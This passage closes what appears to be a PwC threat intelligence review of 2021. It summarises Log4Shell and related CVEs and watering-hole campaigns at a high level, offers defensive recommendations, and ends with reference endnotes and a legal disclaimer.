2.[104] The initial vulnerability (given the ID CVE-2021-44228) became known as Log4Shell, and allowed for unauthenticated remote code execution on a server running the software.[105] This vulnerability was given, and still retains, a CVSS score of 10.0 – the highest rating – due to the dual factors of Log4j being a popular logging utility used in numerous Java applications, as well as the exploit being relatively easy to perform. While a patch was immediately released for this vulnerability, mass-scanning/mass-exploitation attempts for vulnerable servers began almost immediately after the vulnerability was announced. It only took two days for advanced persistent threat actors to get involved in exploiting these vulnerabilities as well.[106] In addition, several new vulnerabilities were spawned from the patches rolled out in order to fix CVE-2021-44228. To summarise the other vulnerabilities: - CVE-2021-45046: This bug exists in Apache Log4j 2.15.0 (the first patch to treat the initial Log4Shell exploit) and allows an attacker to perform remote code execution in certain non-default configurations - CVE-2021-4104 - This is another remote code execution vulnerability that was found during research of the Log4j software, and fortunately only affects Apache Log4j versions before 1.2, which reached end of life in 2015. This vulnerability was assessed to likely affect few systems - CVE-2021-45105 - This vulnerability was found in the Log4j version 2.16; an initial hotfix for the CVEs above. It was found that version 2.16 did not protect from this new vulnerability, which is caused by the capability of the Thread Context Map to make self-referential lookups, thus leading to uncontrolled recursion and a potential StackOverflowError, crashing the programme. This would count as a Denial of Service (DOS), and is not related to remote code execution. As with many vulnerabilities/exploits, it can be difficult to detect the actual exploitation attempts, especially as new variants are rapidly developed. However, given the wide variety of threat actors exploiting these vulnerabilities, it is inevitable that a proportion of them will default to using techniques and tools that are well understood. Having appropriate solutions in place such as AV/EDR may not always detect the actual exploitation attempt, but can be used to detect and monitor follow-on activity. ##### Strategic web compromise activity and browser 0-days While we have highlighted above the most high-profile vulnerabilities throughout 2021, it is also worth noting that threat actors continued to use exploits (in some cases 0-days) as part of lesser known campaigns. For example, strategic web compromises/watering hole attacks had several pieces of research in 2021 highlighting how they have been used to target end users with browser exploits. Victims in parts of Asia were targeted with macOS and iOS exploits for individuals visiting a media website and a political party’s website. In separate campaigns, the North Korea-based threat actor that we track as Black Shoggoth (aka APT37, Reaper) targeted visitors to a South Korean news website that focused its reporting on North Korea, to deliver the BLUELIGHT remote access trojan.[107 108 ] A longer series of campaigns were also detailed in open source research into watering hole attacks against a large number of websites (mainly government or news organisations related to the Middle East), which have links to a spyware vendor called Candiru. [109 110 111] These types of campaigns are noteworthy due to how they can target very specific demographics, with usually more advanced initial access vectors. Developing exploits is more time-consuming and costly than a standard phishing email, but makes it more likely that threat actor activity will not be detected by traditional means. ----- # Conclusion #### In 2021 we observed threat actors frequently abusing valid credentials and exploiting vulnerabilities for initial access, continuing and increasing a trend from previous years. As we highlighted in our 2021 Year in Retrospect report, while in some cases threat actors might acquire credentials to victims’ networks by running phishing campaigns, credential marketplaces are playing an increasingly impactful role in the cyber criminal ecosystem, providing easier initial access into networks to ransomware operators and other threat actors. The large number of 0-day disclosures in 2021 – and the large number of appliances affected by some of them – naturally resulted in higher volumes of exploitation attempts against organisations’ internet-facing servers and appliances both before and after initial public release. APTs and cyber criminal groups alike were observed performing both targeted as well as mass-scale exploitation of these vulnerabilities (with ProxyLogon being a key example), very clearly undermining the public perception that APTs only perform highly-tailored intrusions, and instead demonstrating the appetite for opportunistic widespread access operations. Despite this consideration, known vulnerabilities – such as in Virtual Private Network (VPN) appliances – continue to be successfully exploited by threat actors as we highlighted in our 2020 Year in Retrospect report. Yet, defence in depth, and logging and monitoring of suspicious activity can help identify malicious activity even ahead of vulnerabilities being publicly disclosed. Detection methods developed for suspicious or malicious behaviour can also prove valuable beyond their immediate use case, and support future rule development. Some simple steps you can take include: - Invest in gaining a comprehensive understanding of your environment and updating your asset inventory. If you don’t know what devices and applications are part of your environment, you can’t devise appropriate security plans. - Deploy MFA where supported. Whether this is TOTP based, or using a hardware token supporting U2F, or WebAuth, this makes abuse of credentials harder for an attacker. - Enabling logging of accesses and activity on critical systems, where logs are retained, monitored, and reviewed. - Enabling antivirus protection (for example Windows Defender), and also checking the logs output by the AV to check for any suspicious files, which can then be triaged further (e.g., using a collection of YARA rules). - Generic, behavioural, and heuristic detection rules can help identify even relatively sophisticated attackers as they attempt to move through the network. - Empower your defenders to spend time hunting. This is an excellent way of detecting the unknown, and also helps you identify visibility gaps in your environment. - Consider building a threat model against your controls environment, to better understand how attackers would interact with your controls. This will help you identify key controls, areas that are in need of improvement, and help you prioritise remediation work. - Implement defence in depth. Organisations shouldn’t rely on any one of your detection or security layers detecting or blocking 100% of all attacks. Layered security increases the probability that you will block or detect activity, and gives you more information for responding to incidents. - Prioritise vulnerability patching based on your individual environment and critical assets. As public attention on cyber security matters continues to grow, focusing on actionable defensive measures, plus mitigation and response strategies, ahead of time is imperative for organisations across all sectors, though these will of course change for each one. At the same time, it is more important than ever for defenders to continue collaborating, sharing, and supporting organisations and society; focusing on prevention and detection measures; ----- # Endnotes 1. ‘Your dream job awaits - just please enable editing’, PwC Threat Intelligence, CTO-TIB-20210916-01A 2. ‘Blue Dev 5 - Mysteries of Foreign Affairs’, PwC Threat Intelligence, CTO-TIB-20210527-01A 3. ‘ProxyShell Exploitation’, PwC Threat Intelligence, CTO-QRT-20210820-01A 4. ‘HAFNIUM exploiting Exchange vulnerabilities’, PwC Threat Intelligence, CTO-QRT-20210303-01A 5. ‘Active scanning of CVE-2021-44228’, PwC Threat Intelligence, CTO-QRT-20211210-01A 6. ‘Red Djinns Red Flags’, PwC Threat Intelligence, CTO-TIB-20210903-02A 7. ‘Scanning the internet for vulnerabilities’, PwC Threat Intelligence, CTO-TIB-20211118-01A 8. ‘A Zoom call with White Dev 89’, PwC Threat Intelligence, CTO-TIB-20211118-02A 9. ‘Blue Dev 5 - The Roots of Targeting’, PwC Threat Intelligence, CTO-TIB-20210608-01A 10. ‘Phishing in the Middle East’ PwC Threat Intelligence, CTO-TIB-20210629-02A 11. ‘The Banshee The Flower The Dragon and Prince’, PwC Threat Intelligence, CTO-TIB-20210508-01A 12. ‘The [redacted] sheds light on a campaign’, PwC Threat Intelligence, CTO-TIB-20210712-01A 13. ‘Eat, Sleep, Liderc, Repeat’, PwC Threat Intelligence, CTO-TIB-20210730-01A 14. ‘Babuk - A new kid on the block’, PwC Threat Intelligence, CTO-TIB-20210201-02A 15. ‘Well its been a MirrorBlast’, PwC Threat Intelligence, CTO-TIB-20211025-01A 16. ‘All LNKs lead back to Black Dev 1 Part 1’, PwC Threat Intelligence, CTO-TIB-20210408-01A 17. ‘Colder than IcedID’, PwC Threat Intelligence, CTO-TIB-20210511-01A 18. ‘An interstellar kitten transforms into a jaguar’, PwC Threat Intelligence, CTO-TIB-20211027-01A 19. ‘Introducing Red Dev 14’, PwC Threat Intelligence, CTO-TIB-20210412-01A 20. ‘Exploring Blue Odin’, PwC Threat Intelligence, CTO-TIB-20210308-01A 21. ‘Blue Otso’s Office Expertise’, PwC Threat Intelligence, CTO-TIB-20210122-02A 22. ‘Capital injection’, PwC Threat Intelligence, CTO-TIB-20210630-03A 23. ‘Chasing Shadows’, PwC Threat Intelligence, CTO-TIB-20211021-01A 24. ‘Chasing Shadows: A deep dive into the latest obfuscation methods being used by ShadowPad’, PwC: Adam Prescott, https://www.pwc.co.uk/issues/cyber-security services/research/chasing-shadows.html (8th December 2021) 25. ‘You’re not Shikata Ga Nai believe this’, PwC Threat Intelligence, CTO-TIB-20211102-02A 26. ‘Hiding in plain sight’, PwC Threat Intelligence, CTO-TIB-20211126-01A 27. ‘Analysis of ObliqueRAT’, PwC Threat Intelligence, CTO-TIB-20210330-01A 28. ‘Nothing else BlackMatters’, PwC Threat Intelligence, CTO-TIB-20211209-01A 29. ‘The Banshee The Flower The Dragon and Prince’, PwC Threat Intelligence, CTO-TIB-20210508-01A 30. ‘Nothing else BlackMatters’, PwC Threat Intelligence, CTO-TIB-20211209-01A 31. ‘Causing more Grief’, PwC Threat Intelligence, CTO-TIB-20211028-01A 32. ‘Orange Athos has BADNEWS for its adversaries’, PwC Threat Intelligence, CTO-TIB-20210204-02A 33. ‘The Banshee The Flower The Dragon and Prince’, PwC Threat Intelligence, CTO-TIB-20210508-01A 34. ‘You’re not Shikata Ga Nai believe this’, PwC Threat Intelligence, CTO-TIB-20211102-02A 35. ‘Learning to ChaCha with Red Kelpie’, PwC Threat Intelligence, CTO-TIB-20210624-02A 36. ‘Eat, Sleep, Liderc, Repeat’, PwC Threat Intelligence, CTO-TIB-20210730-01A 37. ‘All LNKs lead back to Black Dev 1 Part 1’, PwC Threat Intelligence, CTO-TIB-20210408-01A 38. ‘The Banshee, the Flower, the Dragon, and Prince’, PwC Threat Intelligence, CTO-TIB-20210805-01A 39. ‘Of Gh0sts and Golang’, PwC Threat Intelligence, CTO-TIB-20211011-01A 40. ‘The mysterious case of the KeyBoy samples’, PwC Threat Intelligence, CTO-TIB-20210614-01A 41. ‘Of Gh0sts and Golang’, PwC Threat Intelligence, CTO-TIB-20211011-01A 42. ‘Red Djinns spider web’, PwC Threat Intelligence, CTO-TIB-20211202-01A 43. ‘Shades of Bluelight’, PwC Threat Intelligence, CTO-TIB-20210910-01A 44. ‘Looking past the clouds, is that Zekapab’, PwC Threat Intelligence, CTO-TIB-20211012-01A 45. ‘How to be a ransomware operator’, PwC Threat Intelligence, CTO-TIB-20210827-01A 46. ‘Dropbox RAT targets Afghan NSC’, PwC Threat Intelligence, CTO-TIB-20210505-01A 47. ‘Shades of Bluelight’, PwC Threat Intelligence, CTO-TIB-20210910-01A 48. ‘Exploring Blue Odin’, PwC Threat Intelligence, CTO-TIB-20210308-01A 49. ‘Red Djinns Red Flags’, PwC Threat Intelligence, CTO-TIB-20210903-02B 50. ‘Red Dev Redemption’, PwC Threat Intelligence, CTO-TIB-20210202-01A 51. ‘Withdrawal symptoms’, PwC Threat Intelligence, CTO-TIB-20210831-01A 52. ‘Who is Black Alicanto hiring’, PwC Threat Intelligence, CTO-TIB-20210913-01A 53. ‘Threats under the Spotlight November 2021’, PwC Threat Intelligence, CTO-TUS-20211203-01A ----- 54. ‘Lockbit 2.0’, PwC Threat Intelligence, CTO-TIB-20211027-02A 55. ‘Eat, Sleep, Liderc, Repeat’, PwC Threat Intelligence, CTO-TIB-20210730-01A 56. ‘Qakbot Technical Analysis’, Kaspersky: Anton Kuzmenko, Oleg Kupreev, Haim Zigel, https://securelist.com/qakbot-technical-analysis/103931/ (2nd September 2021) 57. ‘Internet Crime Report 2020’, FBI Internet Crime Complaint Center (IC3), https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf (2020) 58. ‘Valid Accounts’, MITRE, https://attack.mitre.org/techniques/T1078/ 59. ‘Input Capture: Web Portal Capture’, MITRE, https://attack.mitre.org/techniques/T1056/003/ 60. ‘Suspected Russian Activity Targeting Government and Business Entities Around the Globe’, Mandiant: Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock, https://www.mandiant.com/resources/russian-targeting-gov-business (6th December 2021) 61. ‘Nothing Else BlackMatters’, PwC Threat Intelligence, CTO-TIB-20211209-01A 62. ‘Valid Accounts’, MITRE, https://attack.mitre.org/techniques/T1078/ 63. ‘A unique peek at 13 weeks of leaks - Part 1’, PwC Threat Intelligence, CTO-SIB-20211209-01A 64. https://ora.ox.ac.uk/objects/uuid:6d1260fd-b8ee-4a11-8a5f-e7708d543651 65. ‘Tracking GhostNet: investigating a cyber espionage network’, Greg Walton et al, https://ora.ox.ac.uk/objects/uuid:6d1260fd-b8ee-4a11-8a5f-e7708d543651 (2009) 66. ‘Of Gh0sts and Golang’, PwC Threat Intelligence, CTO-TIB-20211011-01A 67. ‘Red Djinn’s Red Flags’, PwC Cyber Threat Intelligence, CTO-TIB-20210903-02A 68. ‘8t to PIVY Red Dev 17s recipe for compromise’, PwC Threat Intelligence, CTO-TIB-20210428-02A 69. ‘Red Dev 17 PIVY Pivots’, PwC Threat Intelligence, CTO-TIB-20211021-02A 70. ‘A41APT case’, Japan Security Analyst Conference 2021, January 2021, https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwayanagishita_en.pdf 71. ‘The mysterious case of the KeyBoy samples’, PwC Threat Intelligence, CTO-TIB-20210614-01A 72. ‘You’re not Shikata Ga Nai believe this’, PwC Threat Intelligence, CTO-TIB-20211102-02A 73. ‘Phishing in the Middle East’, PwC Threat Intelligence, CTO-TIB-20210629-02A 74. ‘For those about to ROKRAT, we salute you’, PwC Threat Intelligence, CTO-TIB-20211208-01A (or swap with 75) 75. ‘Shades of Bluelight’, PwC Threat Intelligence, CTO-TIB-20210910-01A (or swap with 74) 76. Rclone, ‘Rclone’, https://rclone.org 77. ‘How to be a ransomware operator’, PwC Threat Intelligence, CTO-TIB-20210827-01A 78. F-Secure, ‘C3’, https://github.com/FSecureLABS/C3 79. ‘Dropbox RAT targets Afghanistan NSC’, PwC Threat Intelligence, CTO-TIB-20210505-01A 80. ‘IndigoZebra APT continues to attack Central Asia with evolving tools’, CheckPoint, https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central asia-with-evolving-tools/ (1st July 2021) 81. ‘A41APT case’, Japan Security Analyst Conference 2021, January 2021, https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwayanagishita_en.pdf 82. ‘APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign’, Kaspersky, https://securelist.com/apt10-sophisticated-multi-layered-loader ecipekac-discovered-in-a41apt-campaign/101519/ (30th March 2021) 83. Kaspersky, ‘SAS 2021: Learning to ChaCha with APT41’, https://securelist.com/webinars/sas-2021-learning-to-chacha-with-apt41/ 84. GitHub, ‘TheSAS2021-Red-Kelpie’, https://github.com/PwCUK-CTO/TheSAS2021-Red-Kelpie 85. ‘2021 has broken the record for 0-day hacking attacks’, MIT Technology Review: Patrick Howell O’Neill, https://www.technologyreview.com/2021/09/23/1036140/2021 record-0-day-hacks-reasons/ (23rd September 2021) 86. ‘HAFNIUM exploiting Exchange vulnerabilities’, PwC Threat Intelligence, CTO-QRT-20210303-01A 87. ‘HAFNIUM targeting Exchange Servers with 0-day exploits’, Microsoft, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ (2nd March 2021) 88. ‘Operation Exchange Marauder: Active Exploitation of Multiple 0-day Microsoft Exchange Vulnerabilities’, Volexity: Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, Thomas Lancaster, https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-0-day-vulnerabilities/ (2nd March 2021) 89. HAFNIUM exploiting Exchange vulnerabilities’, PwC Threat Intelligence, CTO-QRT-20210303-01A 90. ‘Introducing Red Dev 14’, PwC Threat Intelligence, CTO-TIB-20210412-01A 91. ‘Red Djinns spider web’, PwC Threat Intelligence, CTO-TIB-20211202-01A 92. ‘DearCry Ransomware’, PwC Threat Intelligence, CTO-QRT-20210315-01A 93. ‘FROM PWN2OWN 2021: A NEW ATTACK SURFACE ON MICROSOFT EXCHANGE - PROXYSHELL!’, Zero Day Initiative, https://www.zerodayinitiative.com/ blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell (18th August 2021) 94. ‘Microsoft Exchange servers are getting hacked via ProxyShell exploits’, Bleeping Computer, https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange servers-are-getting-hacked-via-proxyshell-exploits/ (12th August 2021) 95. ‘ProxyShell Exploitation’, PwC Threat Intelligence, CTO-QRT-20210820-01A 96. MITRE, ‘Initial Access’, https://attack.mitre.org/tactics/TA0001/ 97. Microsoft, ‘Released: March 2021 Exchange Server Security Updates’, https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901 98. ‘PrintNightmare’, PwC Threat Intelligence, CTO-QRT-20210706-01A 99. Microsoft, ‘CVE-2021-1675’, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 100. Microsoft, ‘CVE-2021-34527’, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 101. ‘A Duck Nightmare’, Cynet, https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/#_Technical_Analysis:_ PrintNightmare (11th November 2021) 102. CVE-2021-40444, ‘PwC Threat Intelligence’, CTO-QRT-20210908-01A 103. ‘Untangling the Spider Web’, RiskIQ, https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/ (15th September 2021) 104. ‘Active scanning of CVE-2021-44228’, PwC Threat Intelligence, CTO-QRT-20211210-01A 105. Log4J, ‘Apache Log4j Security Vulnerabilities’, https://logging.apache.org/log4j/2.x/security.html 106. ‘Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation’, Microsoft, https://www.microsoft.com/security/blog/2021/12/11/guidance for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ (11th December 2021) ----- 109. ‘Hooking Candiru’, The Citizen Lab, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ (15th July 2021) 110. ‘How we protect users from 0-day attacks’, Google Threat Analysis Group, https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/ (14th July 2021) 111. ‘Strategic web compromises in the Middle East with a pinch of Candiru’, ESET, https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east pinch-candiru/ (16th November 2021) ----- ## pwc.com/cyber-security This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees, and agents do not accept or assume any liability, responsibility, or duty of care for any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it. -----